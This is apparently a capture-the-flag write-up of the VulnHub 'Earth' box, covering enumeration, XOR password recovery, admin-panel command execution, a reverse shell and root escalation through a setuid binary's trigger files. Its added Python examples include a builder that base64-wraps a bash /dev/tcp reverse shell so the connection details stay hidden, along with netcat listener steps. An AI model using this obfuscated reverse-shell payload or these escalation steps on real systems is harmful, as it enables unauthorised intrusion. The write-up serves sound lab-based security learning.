26 May 2022

Pentesting Fun Stuff

following the cyber security path…

Earth

Introduction

This is a challenge from vulnhub.com created by SirFlash.
According to the description on Vulnhub:

Difficulty: Easy

Earth is an easy box though you will likely find it more challenging than “Mercury” in this series and on the harder side of easy, depending on your experience. There are two flags on the box: a user and root flag which include an md5 hash. This has been tested on VirtualBox so may not work correctly on VMware. Any questions/issues or feedback please email me at: SirFlash at protonmail.com, though it may take a while for me to get back to you.

Enumeration

PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.6 (protocol 2.0)
| ssh-hostkey: 
|   256 5b:2c:3f:dc:8b:76:e9:21:7b:d0:56:24:df:be:e9:a8 (ECDSA)
|_  256 b0:3c:72:3b:72:21:26:ce:3a:84:e8:41:ec:c8:f8:41 (ED25519)
80/tcp  open  http     Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
|_http-title: Bad Request (400)
|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9
443/tcp open  ssl/http Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
|_http-title: Bad Request (400)
| ssl-cert: Subject: commonName=earth.local/stateOrProvinceName=Space
| Subject Alternative Name: DNS:earth.local, DNS:terratest.earth.local
| Issuer: commonName=earth.local/stateOrProvinceName=Space
| Public Key type: rsa
| Public Key bits: 4096
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-10-12T23:26:31
| Not valid after:  2031-10-10T23:26:31
| MD5:   4efa 65d2 1a9e 0718 4b54 41da 3712 f187
|_SHA-1: 04db 5b29 a33f 8076 f16b 8a1b 581d 6988 db25 7651
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9

SSH, a web server and, in the certificate's Subject Alternative Name, two host names: earth.local and terratest.earth.local. Both go into the /etc/hosts file, pointing at the target's IP address.

https://terratest.earth.local shows only: Test site, please ignore.
Nothing more. A little dirb goes a long way:

https://terratest.earth.local/cgi-bin/ (CODE:403|SIZE:199)
https://terratest.earth.local/index.html (CODE:200|SIZE:26)
https://terratest.earth.local/robots.txt (CODE:200|SIZE:521)

The robots.txt file:

User-Agent: *
Disallow: /*.asp
Disallow: /*.aspx
Disallow: /*.bat
Disallow: /*.c
Disallow: /*.cfm
Disallow: /*.cgi
Disallow: /*.com
Disallow: /*.dll
Disallow: /*.exe
Disallow: /*.htm
Disallow: /*.html
Disallow: /*.inc
Disallow: /*.jhtml
Disallow: /*.jsa
Disallow: /*.json
Disallow: /*.jsp
Disallow: /*.log
Disallow: /*.mdb
Disallow: /*.nsf
Disallow: /*.php
Disallow: /*.phtml
Disallow: /*.pl
Disallow: /*.reg
Disallow: /*.sh
Disallow: /*.shtml
Disallow: /*.sql
Disallow: /*.txt
Disallow: /*.xml
Disallow: /testingnotes.*

testingnotes.* looks interesting.
A first guess at the extension is .txt, and that is the right one:

Testing secure messaging system notes:
*Using XOR encryption as the algorithm, should be safe as used in RSA.
*Earth has confirmed they have received our sent messages.
*testdata.txt was used to test encryption.
*terra used as username for admin portal.
Todo:
*How do we send our monthly keys to Earth securely? Or should we change keys weekly?
*Need to test different key lengths to protect against bruteforce. How long should the key be?
*Need to improve the interface of the messaging interface and the admin panel, it's currently very basic.

A few things here are interesting:

XOR is used for encryption
There is a file called ‘testdata.txt’ that was used for testing the encryption
‘terra’ is a valid username for the admin portal

(The remark that XOR “should be safe as used in RSA” is a misconception: RSA does not use XOR, and XOR with a repeating key is only as strong as the secrecy of that key. If the key, or the message it was tested with, is published, every message is recoverable.)

Requesting testdata.txt gives:

According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth's history, life appeared in the oceans and began to affect Earth's atmosphere and surface, leading to the proliferation of anaerobic and, later, aerobic organisms. Some geological evidence indicates that life may have arisen as early as 4.1 billion years ago.

That’s a long key to use for XOR, but why not?
https://earth.local gives the messaging interface mentioned in the notes, which displays the previously sent messages in encoded form.

So now I have some ciphertext, an encryption algorithm (XOR) and a key.
There are several tools for this, like CyberChef. This time I’m going for a very nice website called dcode.fr.
After XOR-ing the ciphertext with the key, I get a plaintext that should be a password. On to the main page of the website.
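The same step in Python instead of a web tool, as an added example that is not part of the original write-up and not the box's own code: the ciphertext is hex-decoded and XOR-ed byte by byte with the key repeated to the message length. Because XOR is symmetric it does not matter which of the two inputs is called the key; if a short password was used as the repeating key and the long text as the message, the plaintext comes out as that password repeated, and the last function extracts the shortest repeating unit. The text and password below are constructed stand-ins, not the strings from the box.

```python
import binascii

# Constructed sample data (not the strings from the box): a short "password"
# used as a repeating XOR key over a longer known text, the way testdata.txt
# was used to test the box's messaging system.
SAMPLE_KEY_TEXT = (
    "According to radiometric dating estimation and other evidence, "
    "Earth formed over 4.5 billion years ago."
)
SAMPLE_PASSWORD = "notTheRealPassword"  # assumption for the demo only


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR data with key, repeating the key as often as needed."""
    if not key:
        raise ValueError("empty key")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def xor_decrypt_hex(cipher_hex: str, key_text: str) -> str:
    """Hex-decode a ciphertext and XOR it with key_text.

    latin-1 never fails to decode, so a wrong key shows up as garbage
    rather than as an exception.
    """
    cipher = binascii.unhexlify(cipher_hex.strip())
    return xor_bytes(cipher, key_text.encode()).decode("latin-1")


def shortest_period(s: str) -> str:
    """Return the shortest unit that, repeated, reproduces s.

    When the plaintext reads 'passwordpasswordpass...', this is the
    password itself.
    """
    for p in range(1, len(s) + 1):
        unit = s[:p]
        if (unit * (len(s) // p + 1))[: len(s)] == s:
            return unit
    return s


def make_sample_ciphertext(password: str = SAMPLE_PASSWORD,
                           text: str = SAMPLE_KEY_TEXT) -> str:
    """Build a hex ciphertext as the box did: text XOR repeating password."""
    return binascii.hexlify(xor_bytes(text.encode(), password.encode())).decode()


def recover_password(cipher_hex: str, key_text: str) -> str:
    """Known-plaintext attack: XOR the ciphertext with the published text,
    then collapse the repeated result to the password."""
    plain = xor_decrypt_hex(cipher_hex, key_text)
    return shortest_period(plain)


if __name__ == "__main__":
    ct = make_sample_ciphertext()
    print("ciphertext:", ct[:60], "...")
    print("plaintext :", xor_decrypt_hex(ct, SAMPLE_KEY_TEXT)[:60], "...")
    print("password  :", recover_password(ct, SAMPLE_KEY_TEXT))
```

Run it as is to see the constructed round trip, or call recover_password() with the hex string from the site and the text of testdata.txt. If the key text is shorter than the ciphertext, the key repeats and everything past its length comes out as garbage; that is the expected sign that the two inputs were paired the wrong way round.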

Gobuster found some pages on the website:

http://earth.local/cgi-bin/ (Status: 403) [Size: 199]
http://earth.local/icons/ (Status: 200) [Size: 74416]
http://earth.local/static/ (Status: 403) [Size: 199]
http://earth.local/admin/ (Status: 200) [Size: 306]

Let’s try the found credentials (terra and the decrypted password) on the admin page.
They work, and the admin panel offers a field to run commands on the server:

Let’s try the command `id`

Command output: uid=48(apache) gid=48(apache) groups=48(apache)

But this is really annoying, so I need a reverse shell.
To do this I start a netcat listener on my end:

$ sudo nc -lvnp 8080
[sudo] password for user: 
listening on [any] 8080 ...

Then I submit a command that connects netcat back to my listener…………..but that doesn’t work.
It seems the command triggers an error on the server side, but the error is not returned as output.
So I need to adjust the command so it won’t trigger that error.
The way to do that is to base64-encode the whole command and submit only the encoded string.
Of course the string has to be decoded on the target machine and the result piped into bash.
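Building that payload, as an added Python example that is not part of the original write-up: the listener address is the one from this page (192.168.202.130:8080); the reverse-shell one-liner itself is my assumption, since the write-up does not print the command it submitted, and the wrapper is the usual echo | base64 -d | bash form. The last function shows what the target decodes and runs, and visible_tokens() checks that the submitted string no longer contains the address, the redirections or the /dev/tcp path in the clear.

```python
import base64
import shlex

# Listener from the write-up. The one-liner below is an assumption: the page
# does not show which command it originally submitted.
LHOST = "192.168.202.130"
LPORT = 8080


def reverse_shell_cmd(lhost: str = LHOST, lport: int = LPORT) -> str:
    """bash-only reverse shell; needs no nc binary on the target."""
    return f"bash -i >& /dev/tcp/{lhost}/{lport} 0>&1"


def b64_wrap(cmd: str) -> str:
    """Return a command that carries cmd only as a base64 blob.

    Whatever inspects the submitted text sees 'echo <blob> | base64 -d | bash';
    the address, the redirections and /dev/tcp only appear after the target
    decodes the blob. Base64 output ('+', '/', '=') is safe unquoted in sh.
    """
    blob = base64.b64encode(cmd.encode()).decode("ascii")
    return f"echo {blob} | base64 -d | bash"


def b64_unwrap(wrapped: str) -> str:
    """What the target ends up executing: decode the blob back to the command."""
    tokens = shlex.split(wrapped)
    blob = tokens[tokens.index("echo") + 1]
    return base64.b64decode(blob).decode()


def visible_tokens(wrapped: str, tokens) -> list:
    """Which of the given substrings still appear in clear text in wrapped."""
    return [t for t in tokens if t in wrapped]


if __name__ == "__main__":
    cmd = reverse_shell_cmd()
    wrapped = b64_wrap(cmd)
    print("submit :", wrapped)
    print("runs   :", b64_unwrap(wrapped))
    print("visible:", visible_tokens(wrapped, [LHOST, "/dev/tcp", ">&"]))
```

Paste the printed "submit" line into the command field; the decoded command is what executes on the target, so it is also the line to check when a payload misbehaves.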

connect to [192.168.202.130] from (UNKNOWN) [192.168.202.129] 60214
id
uid=48(apache) gid=48(apache) groups=48(apache)
python -c 'import pty;pty.spawn("/bin/bash");'
bash-5.1$ 

There is a user called Earth, but its home directory is off limits for now.
Looking for misconfigurations, I list the files with the SUID bit set:

bash-5.1$ find / -perm -4000 -type f 2>/dev/null
find / -perm -4000 -type f 2>/dev/null
/usr/bin/chage
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/su
/usr/bin/mount
/usr/bin/umount
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/at
/usr/bin/sudo
/usr/bin/reset_root
/usr/sbin/grub2-set-bootflag
/usr/sbin/pam_timestamp_check
/usr/sbin/unix_chkpwd
/usr/sbin/mount.nfs
/usr/lib/polkit-1/polkit-agent-helper-1

reset_root seems interesting. It’s a binary, and running it only prints a failure message:

bash-5.1$ /usr/bin/reset_root
/usr/bin/reset_root
CHECKING IF RESET TRIGGERS PRESENT...
RESET FAILED, ALL TRIGGERS ARE NOT PRESENT.

Let’s see what’s inside this binary the easy way with `strings`:

/lib64/ld-linux-x86-64.so.2
setuid
puts
system
access
__libc_start_main
libc.so.6
GLIBC_2.2.5
__gmon_start__
H=@@@
paleblueH
]\UH
credentiH
als rootH
:theEartH
hisflat
[]A\A]A^A_
CHECKING IF RESET TRIGGERS PRESENT...
RESET TRIGGERS ARE PRESENT, RESETTING ROOT PASSWORD TO: Earth
/usr/bin/echo 'root:Earth' | /usr/sbin/chpasswd
RESET FAILED, ALL TRIGGERS ARE NOT PRESENT.
;*3$"
GCC: (GNU) 11.1.1 20210531 (Red Hat 11.1.1-3)
:

So if this binary runs with its triggers in place, the new root password is Earth. The string table also shows it imports access() and system(), so it tests for some files and then runs the chpasswd command, but the trigger paths themselves are not in the string table, so strings cannot reveal them. Another tool can: `ltrace`, which logs the library calls, including the path passed to each access().
But it is not installed on the target machine.
So I need to transfer the file to my local machine. You can do this with netcat.

After transferring the file, I use ltrace to see what those triggers are.

$ ltrace ./reset_root 
puts("CHECKING IF RESET TRIGGERS PRESE"...CHECKING IF RESET TRIGGERS PRESENT...
)                                    = 38
access("/dev/shm/kHgTFI5G", 0)       = -1
access("/dev/shm/Zw7bV9U5", 0)       = -1
access("/tmp/kcM0Wewe", 0)           = -1
puts("RESET FAILED, ALL TRIGGERS ARE N"...RESET FAILED, ALL TRIGGERS ARE NOT PRESENT.
)                                    = 44
+++ exited (status 0) +++

So all three access() calls (mode 0 is F_OK, a pure existence check) have to succeed. /dev/shm and /tmp are world-writable, so the apache user can simply create the files on the target machine:

bash-5.1$ touch /dev/shm/kHgTFI5G
touch /dev/shm/kHgTFI5G
bash-5.1$ touch /dev/shm/Zw7bV9U5
touch /dev/shm/Zw7bV9U5
bash-5.1$ touch /tmp/kcM0Wewe
touch /tmp/kcM0Wewe
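To see why those three touches are enough, here is an added Python model of the check (my code, not the binary's source): the paths are the ones from the ltrace output, and the loose check reproduces access(path, F_OK), which only asks whether something exists at the path and follows symlinks. The strict variant shows what a setuid binary should have done before trusting files in /tmp or /dev/shm: refuse symlinks, require the expected owner and refuse world-writable parent directories. The demo uses a private temporary directory rather than the real paths.

```python
import os
import stat
import tempfile

# Paths from the ltrace output; the binary calls access(path, F_OK) on each.
TRIGGERS = ["/dev/shm/kHgTFI5G", "/dev/shm/Zw7bV9U5", "/tmp/kcM0Wewe"]


def triggers_present(paths) -> bool:
    """The check reset_root appears to perform: access(path, F_OK) for each path.

    F_OK only asks 'does something exist here?' and follows symlinks. In a
    world-writable directory any local user can make that true with touch.
    """
    return all(os.access(p, os.F_OK) for p in paths)


def _dir_is_world_writable(path: str) -> bool:
    st = os.stat(os.path.dirname(path) or ".")
    return bool(st.st_mode & stat.S_IWOTH)


def triggers_present_strict(paths, owner_uid=None) -> bool:
    """Stricter check: each trigger must be a regular file (not a symlink),
    owned by owner_uid (default: the effective uid the program runs as, root
    for a setuid-root binary) and must not live in a world-writable directory."""
    if owner_uid is None:
        owner_uid = os.geteuid()
    for p in paths:
        try:
            st = os.lstat(p)  # lstat: do not follow symlinks
        except FileNotFoundError:
            return False
        if not stat.S_ISREG(st.st_mode):
            return False
        if st.st_uid != owner_uid:
            return False
        if _dir_is_world_writable(p):
            return False
    return True


def demo():
    """Create three triggers in a private temp dir and compare the two checks.

    Returns (loose_before, loose_after_touch, strict_after_touch,
             loose_with_symlink, strict_with_symlink, strict_in_world_writable_dir).
    """
    with tempfile.TemporaryDirectory() as d:  # created mode 0700, owned by us
        paths = [os.path.join(d, n) for n in ("kHgTFI5G", "Zw7bV9U5", "kcM0Wewe")]
        before = triggers_present(paths)
        for p in paths:
            open(p, "w").close()  # the equivalent of `touch`
        loose = triggers_present(paths)
        strict = triggers_present_strict(paths)
        # Replace one trigger by a symlink to another existing file: access()
        # still says yes, the lstat-based check says no.
        os.remove(paths[0])
        os.symlink(paths[1], paths[0])
        loose_symlink = triggers_present(paths)
        strict_symlink = triggers_present_strict(paths)
        # Restore the file and make the directory world-writable with the
        # sticky bit, like /tmp and /dev/shm.
        os.remove(paths[0])
        open(paths[0], "w").close()
        os.chmod(d, 0o1777)
        strict_ww = triggers_present_strict(paths)
        os.chmod(d, 0o700)
        return before, loose, strict, loose_symlink, strict_symlink, strict_ww


if __name__ == "__main__":
    print("real triggers present:", triggers_present(TRIGGERS))
    print("demo:", demo())
```

Run on the target after the touches above, triggers_present(TRIGGERS) is True, which is all the binary needs; the strict check would still fail there because the files are owned by apache and sit in world-writable directories.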

Now for running the file again:

bash-5.1$ /usr/bin/reset_root
/usr/bin/reset_root
CHECKING IF RESET TRIGGERS PRESENT...
RESET TRIGGERS ARE PRESENT, RESETTING ROOT PASSWORD TO: Earth
bash-5.1$ su root
su root
Password: Earth

[root@earth terratest.earth.local]#

Got root.

[root@earth ~]# cat root_flag.txt
cat root_flag.txt

              _-o#&&*''''?d:>b\_
          _o/"`''  '',, dMF9MMMMMHo_
       .o&#'        `"MbHMMMMMMMMMMMHo.
     .o"" '         vodM*$&&HMMMMMMMMMM?.
    ,'              $M&ood,~'`(&##MMMMMMH\
   /               ,MMMMMMM#b?#bobMMMMHMMML
  &              ?MMMMMMMMMMMMMMMMM7MMM$R*Hk
 ?$.            :MMMMMMMMMMMMMMMMMMM/HMMM|`*L
|               |MMMMMMMMMMMMMMMMMMMMbMH'   T,
$H#:            `*MMMMMMMMMMMMMMMMMMMMb#}'  `?
]MMH#             ""*""""*#MMMMMMMMMMMMM'    -
MMMMMb_                   |MMMMMMMMMMMP'     :
HMMMMMMMHo                 `MMMMMMMMMT       .
?MMMMMMMMP                  9MMMMMMMM}       -
-?MMMMMMM                  |MMMMMMMMM?,d-    '
 :|MMMMMM-                 `MMMMMMMT .M|.   :
  .9MMM[                    &MMMMM*' `'    .
   :9MMk                    `MMM#"        -
     &M}                     `          .-
      `&.                             .
        `~,   .                     ./
            . _                  .-
              '`--._,dd###pp=""'

Congratulations on completing Earth!
If you have any feedback please contact me at SirFlash@protonmail.com
[root_flag_b0da9554d29db2117b02aa8b66ec492e]

And that was Earth.
A nice challenge that was indeed on the harder side of easy.

I see that I forgot to look for the user flag.
But given the root flag’s file name, I know what to look for:

[root@earth ~]# cat /var/earth_web/user_flag.txt              
cat /var/earth_web/user_flag.txt
[user_flag_3353b67d6437f07ba7d34afd7d2fc27d]

Now it’s really done 🙂
